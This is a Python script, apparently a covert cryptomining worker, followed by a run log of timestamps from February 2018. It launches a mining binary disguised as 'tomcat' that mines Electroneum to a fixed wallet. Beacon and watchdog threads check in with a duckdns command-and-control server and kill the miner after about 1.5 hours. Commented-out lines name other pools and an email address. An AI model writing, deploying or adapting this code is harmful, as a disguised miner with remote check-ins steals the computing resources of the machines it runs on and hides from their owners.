import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:30:04.208633
#2018-02-17 17:18:07.348227
#2018-02-17 19:06:05.620288
#2018-02-17 20:54:01.487083
#2018-02-17 22:40:08.483020
#2018-02-18 00:24:01.602130
#2018-02-18 02:15:01.513976
#2018-02-18 04:02:05.910230
#2018-02-18 05:53:01.956499
#2018-02-18 07:44:01.311337
#2018-02-18 09:32:01.291059
#2018-02-18 11:17:07.034219
#2018-02-18 13:03:01.775358
#2018-02-18 14:50:01.318114
#2018-02-18 16:37:07.072240
#2018-02-18 18:26:06.047761
#2018-02-18 20:13:01.487929
#2018-02-18 21:58:04.814001
#2018-02-18 23:47:05.320969
#2018-02-19 01:33:03.681131
#2018-02-19 03:21:04.164003
#2018-02-19 05:06:06.152171
#2018-02-19 06:52:06.258908
#2018-02-19 08:41:04.522153
#2018-02-19 10:30:05.956939
#2018-02-19 12:19:08.138350
#2018-02-19 14:06:09.167581
#2018-02-19 15:55:08.896409
#2018-02-19 17:42:04.768237
#2018-02-19 19:30:04.526057
#2018-02-19 21:17:04.701479
#2018-02-19 23:04:04.871068
#2018-02-20 00:47:07.863569
#2018-02-20 02:38:04.250126
#2018-02-20 04:28:01.999922
#2018-02-20 06:14:01.442783
#2018-02-20 07:59:04.428387
#2018-02-20 09:44:01.491383
#2018-02-20 11:28:05.825912
#2018-02-20 13:15:01.420069
#2018-02-20 15:01:04.544300
#2018-02-20 16:47:02.093055
#2018-02-20 18:35:06.567052
#2018-02-20 20:25:08.784736
#2018-02-20 22:10:10.671945
#2018-02-20 23:50:03.830307
#2018-02-21 01:35:09.288604
#2018-02-21 03:22:02.077654
#2018-02-21 05:10:03.800172
#2018-02-21 06:57:03.981699
#2018-02-21 08:43:04.914333
#2018-02-21 10:28:06.522429
#2018-02-21 12:18:02.195189
#2018-02-21 14:07:07.598220
#2018-02-21 15:54:06.549361
#2018-02-21 17:46:04.281524
#2018-02-21 19:31:08.687613
#2018-02-21 21:20:08.284067
#2018-02-21 23:06:04.221359
#2018-02-22 00:53:05.304394
#2018-02-22 02:41:07.560185
#2018-02-22 04:27:06.282529
#2018-02-22 06:13:04.693212
#2018-02-22 07:57:01.840592
#2018-02-22 09:46:01.875222
#2018-02-22 11:31:04.446373
#2018-02-22 13:17:07.132955
#2018-02-22 15:05:10.994920
#2018-02-22 16:50:04.138044
#2018-02-22 18:37:07.256568
#2018-02-22 20:27:07.380852
#2018-02-22 22:14:03.949429
#2018-02-23 00:02:05.427924
#2018-02-23 01:51:07.541140
#2018-02-23 03:41:04.071939
#2018-02-23 05:26:07.287284
#2018-02-23 07:12:05.335879
#2018-02-23 09:18:01.435605
#2018-02-23 11:23:05.788471
#2018-02-23 13:13:01.711291
#2018-02-23 14:58:02.079375
#2018-02-23 16:46:01.820373
#2018-02-23 18:39:05.936074
#2018-02-23 20:26:05.067808
#2018-02-23 22:13:08.398438
#2018-02-24 00:00:11.409070
#2018-02-24 01:50:02.960590
#2018-02-24 03:35:08.939255
#2018-02-24 05:20:08.021247
#2018-02-24 07:08:02.007758
#2018-02-24 08:54:07.489755
#2018-02-24 10:57:06.973240
#2018-02-24 12:43:03.553862
#2018-02-24 14:32:04.969786
#2018-02-24 16:19:05.248477
#2018-02-24 18:13:07.255690
#2018-02-24 19:59:04.020274
#2018-02-24 21:42:06.458729
#2018-02-25 00:37:04.793532
#2018-02-25 04:13:04.965956
#2018-02-25 07:44:04.169544